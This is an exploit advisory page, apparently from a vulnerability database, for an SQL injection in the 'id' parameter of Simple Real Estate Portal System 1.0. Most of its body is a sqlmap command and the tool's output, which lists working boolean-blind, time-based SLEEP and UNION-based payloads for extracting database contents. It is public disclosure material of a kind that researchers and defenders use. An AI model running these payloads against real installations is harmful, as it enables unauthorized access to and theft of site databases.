Simple Real Estate Portal System 1.0 id SQLi

2022.02.28
Credit: Mosaaed
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection # Date: 22/02/2022 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux # Sqlmap command: sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top